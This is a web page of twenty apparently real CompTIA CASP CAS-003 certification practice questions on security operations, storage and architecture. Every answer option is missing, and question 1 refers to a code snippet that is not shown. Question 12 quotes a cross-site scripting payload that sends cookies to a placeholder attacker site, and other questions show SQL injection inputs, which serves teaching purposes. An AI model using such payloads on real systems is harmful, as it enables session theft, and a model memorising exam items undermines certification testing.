Free to study CompTIA CASP CAS-003 exam questions online

CompTIA Advanced Security Practitioner (CASP) is the ideal certification for technical professionals who wish to remain immersed in technology as opposed to strictly managing. The new CompTIA CASP CAS-003 exam is available as of April 2, 2018. The CompTIA Advanced Security Practitioner certification validates advanced-level competency in risk management; enterprise security operations and architecture; research and collaboration; and integration of enterprise security.

Go ahead to test the CAS-003 exam questions freely.

1. The code snippet below controls all electronic door locks to a secure facility in which the doors should only fail open in an emergency. In the code, “criticalValue” indicates if an emergency is underway:

Which of the following is the BEST course of action for a security analyst to recommend to the software developer?

 
 
 
 

2. An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions.

Which of the following would BEST accomplish this?

 
 
 
 

3. Company ABC’s SAN is nearing capacity, and will cause costly downtimes if servers run out disk space.

Which of the following is a more cost effective alternative to buying a new SAN?

 
 
 
 

4. A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. The security authentication on the Windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the UNIX share.

Which of the following settings on the UNIX server would correct this problem?

 
 
 
 

5. A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition to the normal complement of security controls (e.g. antivirus, host hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on the VMs.

Which of the following will meet this goal without requiring any hardware pass-through implementations?

 
 
 
 

6. A user has a laptop configured with multiple operating system installations. The operating systems are all installed on a single SSD, but each has its own partition and logical volume.

Which of the following is the BEST way to ensure confidentiality of individual operating system data?

 
 
 
 

7. After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following piece of code used by a web based shopping cart.

SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT);

The programmer found that every time a user adds an item to the cart, a temporary file is created on the web server /tmp directory. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MM-DD-YYYY, (e.g. smartphone-12-25-2013.tmp) containing the price of the item being purchased.

Which of the following is MOST likely being exploited to manipulate the price of a shopping cart’s items?

 
 
 
 

8. The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. The single controller in the storage array has failed, so the administrator wants to move the drives to a storage array from a different manufacturer in order to access the data.

Which of the following issues may potentially occur?

 
 
 
 

9. Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim’s privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed.

Which of the following BEST describes the application issue?

 
 
 
 
 
 

10. A developer is determining the best way to improve security within the code being developed. The developer is focusing on input fields where customers enter their credit card details.

Which of the following techniques, if implemented in the code, would be the MOST effective in protecting the fields from malformed input?

 
 
 
 

11. A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no IPv6 routing into or out of the network.

Which of the following is the BEST course of action?

 
 
 
 

12. A security administrator notices the following line in a server’s security log:

<input name=’credentials’ type=’TEXT’ value=’" + request.getParameter(‘><script>document.location=’http://badsite.com/?q=’document.cookie</script>’) + "’;

The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server.

Which of the following should the security administrator implement to prevent this particular attack?

 
 
 
 
 

13. A popular commercial virtualization platform allows for the creation of virtual hardware. To virtual machines, this virtual hardware is indistinguishable from real hardware. By implementing virtualized TPMs, which of the following trusted system concepts can be implemented?

 
 
 
 

14. An organization is concerned with potential data loss in the event of a disaster, and created a backup datacenter as a mitigation strategy. The current storage method is a single NAS used by all servers in both datacenters.

Which of the following options increases data availability in the event of a datacenter failure?

 
 
 
 

15. An application present on the majority of an organization’s 1,000 systems is vulnerable to a buffer overflow attack.

Which of the following is the MOST comprehensive way to resolve the issue?

 
 
 
 

16. select id, firstname, lastname from authors

User input= firstname= Hack;man

lastname=Johnson

Which of the following types of attacks is the user attempting?

 
 
 
 

17. A government agency considers confidentiality to be of utmost importance and availability issues to be of least importance. Knowing this, which of the following correctly orders various vulnerabilities in the order of MOST important to LEAST important?

 
 
 
 

18. A security administrator wants to deploy a dedicated storage solution which is inexpensive, can natively integrate with AD, allows files to be selectively encrypted and is suitable for a small number of users at a satellite office.

Which of the following would BEST meet the requirement?

 
 
 
 

19. At 9:00 am each morning, all of the virtual desktops in a VDI implementation become extremely slow and/or unresponsive. The outage lasts for around 10 minutes, after which everything runs properly again. The administrator has traced the problem to a lab of thin clients that are all booted at 9:00 am each morning.

Which of the following is the MOST likely cause of the problem and the BEST solution? (Select TWO).

 
 
 
 
 
 
 
 

20. A security administrator is shown the following log excerpt from a Unix system:

2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198.51.100.23 port 37914 ssh2

2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51.100.23 port 37915 ssh2

2013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198.51.100.23 port 37916 ssh2

2013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198.51.100.23 port 37918 ssh2

2013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198.51.100.23 port 37920 ssh2

2013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198.51.100.23 port 37924 ssh2

Which of the following is the MOST likely explanation of what is occurring and the BEST immediate response? (Select TWO).

 
 
 
 
 
 
 
 

 

 

Learning Real CAS-003 Exam Questions For CompTIA CASP Exam

Add a Comment

Your email address will not be published. Required fields are marked *